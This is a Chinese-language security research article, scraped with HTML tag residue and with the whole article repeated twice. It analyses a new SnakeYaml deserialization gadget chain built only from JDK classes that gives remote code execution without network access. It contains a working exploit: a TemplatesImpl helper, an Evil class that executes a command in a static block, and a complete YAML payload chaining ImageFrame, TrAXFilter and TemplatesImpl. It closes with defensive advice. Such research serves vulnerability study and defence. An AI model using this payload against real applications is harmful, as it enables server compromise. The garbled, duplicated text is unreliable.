SnakeYaml 不出网 RCE 新链（JDK原生链）挖掘技术分析<\/h1>

前言<\/h2>
在Java反序列化漏洞研究中，SnakeYaml作为一个常用的YAML解析库，其反序列化安全问题一直备受关注。本文详细分析了一种新的SnakeYaml利用链，该链完全基于JDK原生类，无需额外依赖且不需要出网即可实现RCE（远程代码执行）。<\/p>

技术背景<\/h2>

SnakeYaml反序列化机制<\/h3>

与FastJson相比，SnakeYaml的反序列化特性如下：<\/p>

特性<\/th> Fastjson<\/th> SnakeYaml<\/th> <\/tr> <\/thead>

setter<\/td> ✅<\/td> ✅<\/td> <\/tr>

getter<\/td> ✅<\/td> ❌<\/td> <\/tr>

constructor<\/td>

⭕<\/td>

特性<\/th>	Fastjson<\/th>	SnakeYaml<\/th> <\/tr> <\/thead>
setter<\/td>	✅<\/td>	✅<\/td> <\/tr>
getter<\/td>	✅<\/td>	❌<\/td> <\/tr>
constructor<\/td>	⭕<\/td>	✅（有条件）<\/td> <\/tr> <\/tbody> <\/table> SnakeYaml的利用链主要围绕：<\/p> 构造器利用<\/li> setter方法利用<\/li> HashMap机制触发hashCode方法<\/li> <\/ol> TemplatesImpl利用原理<\/h3> `TemplatesImpl<\/code>是Java反序列化中常用的类，其利用链核心在于：<\/p>` _name<\/code>、_bytecodes<\/code>等关键变量不为null<\/li> 通过ClassLoader::defineClass<\/code>方法加载恶意类<\/li> 恶意类需继承com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code><\/li> <\/ol> 典型利用代码示例：<\/p> public<\/span> static<\/span> TemplatesImpl getTemplatesImpl<\/span>()<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span> <\/span><\/span> Field bytecodes =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span> <\/span><\/span> Field name =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span> <\/span><\/span> Field tfactory =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span> <\/span><\/span> name.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> bytecodes.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> tfactory.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> byte<\/span>[][]<\/span> myBytes =<\/span> new<\/span> byte<\/span>[<\/span>1<\/span>][];<\/span> <\/span><\/span> myBytes[<\/span>0<\/span>]<\/span> =<\/span> Repository.<\/span>lookupClass<\/span>(<\/span>Evil.<\/span>class<\/span>).<\/span>getBytes<\/span>();<\/span> <\/span><\/span> bytecodes.<\/span>set<\/span>(<\/span>templates,<\/span> myBytes);<\/span> <\/span><\/span> name.<\/span>set<\/span>(<\/span>templates,<\/span> ""<\/span>);<\/span> <\/span><\/span> tfactory.<\/span>set<\/span>(<\/span>templates,<\/span> new<\/span> TransformerFactoryImpl());<\/span> <\/span><\/span> return<\/span> templates;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>TrAXFilter利用链<\/h3> 在CC链中，TrAXFilter<\/code>通过构造器调用TemplatesImpl::newTransformer<\/code>方法：<\/p> public<\/span> TrAXFilter<\/span>(<\/span>Templates templates)<\/span> throws<\/span> TransformerConfigurationException {<\/span> <\/span><\/span> _templates =<\/span> templates;<\/span> <\/span><\/span> _transformer =<\/span> (<\/span>TransformerImpl)<\/span> templates.<\/span>newTransformer<\/span>();<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>技术难点与突破<\/h2> 难点1：SnakeYaml中构造byte[][]<\/h3> 在YAML中表示byte[][]<\/code>类型的挑战：<\/p> 官方文档仅提供!!binary<\/code>表示byte[]<\/code><\/li> 需要通过特殊语法表示二维字节数组<\/li> <\/ol> 解决方案：<\/p> !!com.heihu577.bean.TestByte<\/span> [[!!binary<\/span> SGVsbG8=]]<\/span> <\/span><\/span><\/code><\/pre>难点2：TemplatesImpl实例创建失败<\/h3> 问题原因：<\/p> TemplatesImpl<\/code>有多个5参数构造器<\/li> SnakeYaml在多个同参数数量构造器时不会强制类型转换<\/li> <\/ol> 底层源码分析（Constructor$ConstructSequence<\/code>）：<\/p> 首先检查参数数量匹配的构造器数量<\/li> 当只有一个匹配时，会尝试强制类型转换<\/li> 当有多个匹配时，需要精确类型匹配<\/li> <\/ol> 突破方案：引用数据类型<\/h3> 使用YAML的引用机制绕过限制：<\/p> 使用&<\/code>定义锚点<\/li> 使用<\/code>引用锚点<\/li> 通过数组确保引用创建顺序<\/li> <\/ol> 示例：<\/p> [ <\/span><\/span> {binaryData<\/span>: &A<\/span> [!!binary<\/span> "SGVsbG8="<\/span>]}, <\/span><\/span> !!com.example.TargetClass<\/span> [A,<\/span> ...]<\/span> <\/span><\/span>] <\/span><\/span><\/code><\/pre>完整利用链构建<\/h2> 关键类发现<\/h3> 发现com.sun.javafx.iio.ImageFrame<\/code>类：<\/p> 构造器包含byte[][]<\/code>参数<\/li> 构造器参数数量不唯一<\/li> 可强制触发类型转换<\/li> <\/ul> 构造器签名：<\/p> public<\/span> ImageFrame<\/span>(<\/span>ImageStorage.<\/span>Type<\/span> type,<\/span> byte<\/span>[][]<\/span> imageData,<\/span> ...)<\/span> <\/span><\/span><\/code><\/pre>POC构造步骤<\/h3> 准备恶意类（继承AbstractTranslet<\/code>）<\/li> <\/ol> public<\/span> class<\/span> Evil<\/span> extends<\/span> AbstractTranslet {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... 必须实现的方法 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 获取恶意类字节码BASE64<\/li> <\/ol> byte<\/span>[]<\/span> encode =<\/span> new<\/span> Base64().<\/span>encode<\/span>(<\/span>Repository.<\/span>lookupClass<\/span>(<\/span>Evil.<\/span>class<\/span>).<\/span>getBytes<\/span>());<\/span> <\/span><\/span><\/code><\/pre> 构建YAML Payload：<\/li> <\/ol> [ <\/span><\/span> !!com.sun.javafx.iio.ImageFrame<\/span> [null<\/span>, null<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, &A<\/span> [!!binary<\/span> "恶意类BASE64"<\/span>], null<\/span>], <\/span><\/span> !!com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter<\/span> [ <\/span><\/span> !!com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl<\/span> [ <\/span><\/span> A,<\/span> <\/span><\/span> "任意名称"<\/span>, <\/span><\/span> !!java.util.Properties<\/span> {}, <\/span><\/span> !!int<\/span> 0<\/span>, <\/span><\/span> !!com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl<\/span> {} <\/span><\/span> ] <\/span><\/span> ] <\/span><\/span>] <\/span><\/span><\/code><\/pre>完整技术流程图<\/h2> SnakeYaml解析 ↓ 创建ImageFrame实例（触发byte[][]转换） ↓ 通过引用A传递byte[][] ↓ 创建TemplatesImpl实例（使用转换后的byte[][]） ↓ TrAXFilter构造器触发TemplatesImpl.newTransformer() ↓ 恶意类静态代码块执行 ↓ RCE达成 <\/code><\/pre> 防御建议<\/h2> 禁用SnakeYaml的任意类加载：<\/li> <\/ol> new<\/span> Yaml(<\/span>new<\/span> SafeConstructor());<\/span> <\/span><\/span><\/code><\/pre> 升级JDK到最新版本<\/li> 对YAML输入进行严格过滤<\/li> 使用白名单机制限制反序列化类<\/li> <\/ol> 总结<\/h2> 该技术突破点在于：<\/p> 利用ImageFrame强制byte[][]类型转换<\/li> 巧妙运用YAML引用机制<\/li> 纯JDK原生类利用，无额外依赖<\/li> 完全不出网的RCE实现<\/li> <\/ol> 这种利用方式展示了即使在没有外部依赖和不出网的严格环境下，Java反序列化仍然存在潜在风险，提醒开发者需要更加重视反序列化安全防护。<\/p>

✅（有条件）<\/td> <\/tr> <\/tbody> <\/table>

SnakeYaml的利用链主要围绕：<\/p>

构造器利用<\/li>
setter方法利用<\/li>

HashMap机制触发hashCode方法<\/li> <\/ol>

TemplatesImpl利用原理<\/h3>

TemplatesImpl<\/code>是Java反序列化中常用的类，其利用链核心在于：<\/p>


_name<\/code>、_bytecodes<\/code>等关键变量不为null<\/li>
通过ClassLoader::defineClass<\/code>方法加载恶意类<\/li>
恶意类需继承com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code><\/li>
<\/ol>
典型利用代码示例：<\/p>
public<\/span> static<\/span> TemplatesImpl getTemplatesImpl<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>    Field bytecodes =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>    Field name =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>    Field tfactory =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span>
<\/span><\/span>    name.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    bytecodes.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    tfactory.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    byte<\/span>[][]<\/span> myBytes =<\/span> new<\/span> byte<\/span>[<\/span>1<\/span>][];<\/span>
<\/span><\/span>    myBytes[<\/span>0<\/span>]<\/span> =<\/span> Repository.<\/span>lookupClass<\/span>(<\/span>Evil.<\/span>class<\/span>).<\/span>getBytes<\/span>();<\/span>
<\/span><\/span>    bytecodes.<\/span>set<\/span>(<\/span>templates,<\/span> myBytes);<\/span>
<\/span><\/span>    name.<\/span>set<\/span>(<\/span>templates,<\/span> ""<\/span>);<\/span>
<\/span><\/span>    tfactory.<\/span>set<\/span>(<\/span>templates,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>    return<\/span> templates;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>TrAXFilter利用链<\/h3>
在CC链中，TrAXFilter<\/code>通过构造器调用TemplatesImpl::newTransformer<\/code>方法：<\/p>
public<\/span> TrAXFilter<\/span>(<\/span>Templates templates)<\/span> throws<\/span> TransformerConfigurationException {<\/span>
<\/span><\/span>    _templates =<\/span> templates;<\/span>
<\/span><\/span>    _transformer =<\/span> (<\/span>TransformerImpl)<\/span> templates.<\/span>newTransformer<\/span>();<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>技术难点与突破<\/h2>
难点1：SnakeYaml中构造byte[][]<\/h3>
在YAML中表示byte[][]<\/code>类型的挑战：<\/p>

官方文档仅提供!!binary<\/code>表示byte[]<\/code><\/li>
需要通过特殊语法表示二维字节数组<\/li>
<\/ol>
解决方案：<\/p>
!!com.heihu577.bean.TestByte<\/span> [[!!binary<\/span> SGVsbG8=]]<\/span>
<\/span><\/span><\/code><\/pre>难点2：TemplatesImpl实例创建失败<\/h3>
问题原因：<\/p>

TemplatesImpl<\/code>有多个5参数构造器<\/li>
SnakeYaml在多个同参数数量构造器时不会强制类型转换<\/li>
<\/ol>
底层源码分析（Constructor$ConstructSequence<\/code>）：<\/p>

首先检查参数数量匹配的构造器数量<\/li>
当只有一个匹配时，会尝试强制类型转换<\/li>
当有多个匹配时，需要精确类型匹配<\/li>
<\/ol>
突破方案：引用数据类型<\/h3>
使用YAML的引用机制绕过限制：<\/p>

使用&<\/code>定义锚点<\/li>
使用*<\/code>引用锚点<\/li>
通过数组确保引用创建顺序<\/li>
<\/ol>
示例：<\/p>
[
<\/span><\/span>  {binaryData<\/span>: &A<\/span> [!!binary<\/span> "SGVsbG8="<\/span>]},
<\/span><\/span>  !!com.example.TargetClass<\/span> [*A,<\/span> ...]<\/span>
<\/span><\/span>]
<\/span><\/span><\/code><\/pre>完整利用链构建<\/h2>
关键类发现<\/h3>
发现com.sun.javafx.iio.ImageFrame<\/code>类：<\/p>

构造器包含byte[][]<\/code>参数<\/li>
构造器参数数量不唯一<\/li>
可强制触发类型转换<\/li>
<\/ul>
构造器签名：<\/p>
public<\/span> ImageFrame<\/span>(<\/span>ImageStorage.<\/span>Type<\/span> type,<\/span> byte<\/span>[][]<\/span> imageData,<\/span> ...)<\/span>
<\/span><\/span><\/code><\/pre>POC构造步骤<\/h3>

准备恶意类（继承AbstractTranslet<\/code>）<\/li>
<\/ol>
public<\/span> class<\/span> Evil<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ... 必须实现的方法
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
获取恶意类字节码BASE64<\/li>
<\/ol>
byte<\/span>[]<\/span> encode =<\/span> new<\/span> Base64().<\/span>encode<\/span>(<\/span>Repository.<\/span>lookupClass<\/span>(<\/span>Evil.<\/span>class<\/span>).<\/span>getBytes<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>
构建YAML Payload：<\/li>
<\/ol>
[
<\/span><\/span>  !!com.sun.javafx.iio.ImageFrame<\/span> [null<\/span>, null<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, &A<\/span> [!!binary<\/span> "恶意类BASE64"<\/span>], null<\/span>],
<\/span><\/span>  !!com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter<\/span> [
<\/span><\/span>    !!com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl<\/span> [
<\/span><\/span>      *A,<\/span>
<\/span><\/span>      "任意名称"<\/span>,
<\/span><\/span>      !!java.util.Properties<\/span> {},
<\/span><\/span>      !!int<\/span> 0<\/span>,
<\/span><\/span>      !!com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl<\/span> {}
<\/span><\/span>    ]
<\/span><\/span>  ]
<\/span><\/span>]
<\/span><\/span><\/code><\/pre>完整技术流程图<\/h2>
SnakeYaml解析
  ↓
创建ImageFrame实例（触发byte[][]转换）
  ↓
通过引用*A传递byte[][]
  ↓
创建TemplatesImpl实例（使用转换后的byte[][]）
  ↓
TrAXFilter构造器触发TemplatesImpl.newTransformer()
  ↓
恶意类静态代码块执行
  ↓
RCE达成
<\/code><\/pre>
防御建议<\/h2>

禁用SnakeYaml的任意类加载：<\/li>
<\/ol>
new<\/span> Yaml(<\/span>new<\/span> SafeConstructor());<\/span>
<\/span><\/span><\/code><\/pre>
升级JDK到最新版本<\/li>
对YAML输入进行严格过滤<\/li>
使用白名单机制限制反序列化类<\/li>
<\/ol>
总结<\/h2>
该技术突破点在于：<\/p>

利用ImageFrame强制byte[][]类型转换<\/li>
巧妙运用YAML引用机制<\/li>
纯JDK原生类利用，无额外依赖<\/li>
完全不出网的RCE实现<\/li>
<\/ol>
这种利用方式展示了即使在没有外部依赖和不出网的严格环境下，Java反序列化仍然存在潜在风险，提醒开发者需要更加重视反序列化安全防护。<\/p>